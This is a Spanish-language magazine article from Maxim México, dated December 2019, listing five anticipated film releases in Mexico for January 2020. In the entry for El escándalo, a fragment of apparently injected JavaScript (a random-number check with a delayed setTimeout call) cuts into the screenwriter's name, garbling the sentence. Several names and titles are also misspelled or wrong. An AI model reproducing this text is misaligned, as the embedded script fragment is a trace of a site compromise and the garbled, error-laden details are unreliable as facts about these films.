Los estrenos de cine más esperados en enero 2020 en México

    Los estrenos de cine más esperados en enero 2020 en México

    Año nuevo, cine nuevo.

    Autor: Redacción Maxim 26 diciembre, 2019



    Dreamworks

     

    ¿QUÉ VER EN EL CINE EN ENERO DE 2020 EN MÉXICO?

     

    Por fin llega el 2020 y junto con todas las sorpresas que nos tiene preparadas, al menos podemos predecir las películas que veremos en el cine. A continuación las que más esperamos en enero. Que no se te escapen.

     

     

    1917

    Estreno: 17 de enero

     

    Por fin veremos el regreso del director Sam Mendes (Belleza americana), después de casi una década involucrado en la franquicia de James Bond. Esta vez nos contará una historia sobre la valentía de los jóvenes soldados que vivieron la Primera Guerra Mundial, y el dilema al que se enfrentan por recibir las órdenes de sus superiores. Esto de la mano de los actores Andrew Scott (Fleabag), Benedict Cumberbatch (Doctor Strange) y Richard Madden (Game of Thrones), así como del ojo maestro del experimentado cinefotógrafo Roger Deakins (Blade Runner 2019). Garantía de peliculón.

     

     

    Bad Boys para siempre

    Estreno: 17 de enero

     

    A 24 años de aquel clásico dirigido por Michael Bay llamado Bad Boys, y que en México conocimos como Dos policías rebeldes, vuelve esta dupla de justicieros poseedores de un gran estilo para hacer cumplir la ley. En esta secuela, Will Smith y Martin Lawrence regresan como Mike Lawry y Marcus Burnett respectivamente, para proteger al testigo de un asesinato mientras investigan un caso de heroína robada del depósito de pruebas de su recinto policial. También es dirigida por Michael Bay, ahora más maduro y con más juguetes.

     

     

     

    Jojo Rabbit

    Estreno: 24 de enero

     

     

    Antes de ver a la primera actriz Scarlett Johansson como Black Widow en este 2020, la veremos como una mujer en plena Segunda Guerra Mundial y que decide esconder un secreto y cuyo hijo tiene una imaginación más allá de desbordante. Todo esto ya luce bien, pero también hay que decir que la cinta es escrita, actuada y dirigida por Taika Waitit (Thor: Ragnarok), quien se ha ganado fama de no tomarse nada tan en serio y lo cual, si tomamos en cuenta el contexto y el personaje polémico que interpreta, nos garantiza una cinta de humor bastante negro. 

     

     

    Presencias del mal

    Estreno: 24 de enero

     

    Esta película promete mantenernos en el filo de nuestros asientos, gracias a la probada dirección de Fiora Sigismoni. Su estilo oscuro y tenebroso parece venirle como anillo al dedo a esta historia escrita por Carey W. Hayes y Chad Hayes (El Conjuro). Una joven institutriz (Mackenzie Davis) es contratada por un hombre que se ha convertido en responsable de sus sobrinos después de la muerte de sus padres. Una versión moderna de la fantástica novela de Henry James «Una vuelta de tuerca».

     

     

     

    El escándalo

    Estreno: 31 de enero

     

    Dinamita pura. Charlize Theron, Margot Robbie y Nicole Kidman protagonizan esta historia en donde un grupo de mujeres se enfrenta al jefe de Fox News, Roger Ailes, y la atmósfera tóxica que presidió en la red. El guion corre a cargo de Charles Random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andolph (The big short) y el director es Jay Roach, quien nos asombró con la seria cinta Trumbo, después de haber dirigido toda la saga de Meet The Parents. Con toda esta combinación la película es garantía de sano esparcimiento con conciencia de la problemática sexista que afecta al planeta.

     

     

     

    Ahora que sí prefieres no salir de casa, aquí te dejamos los  ESTRENOS DE NETFLIX EN ENERO DE 2020

     

    Temas relacionados con esta nota: , ,

Año nuevo, cine nuevo.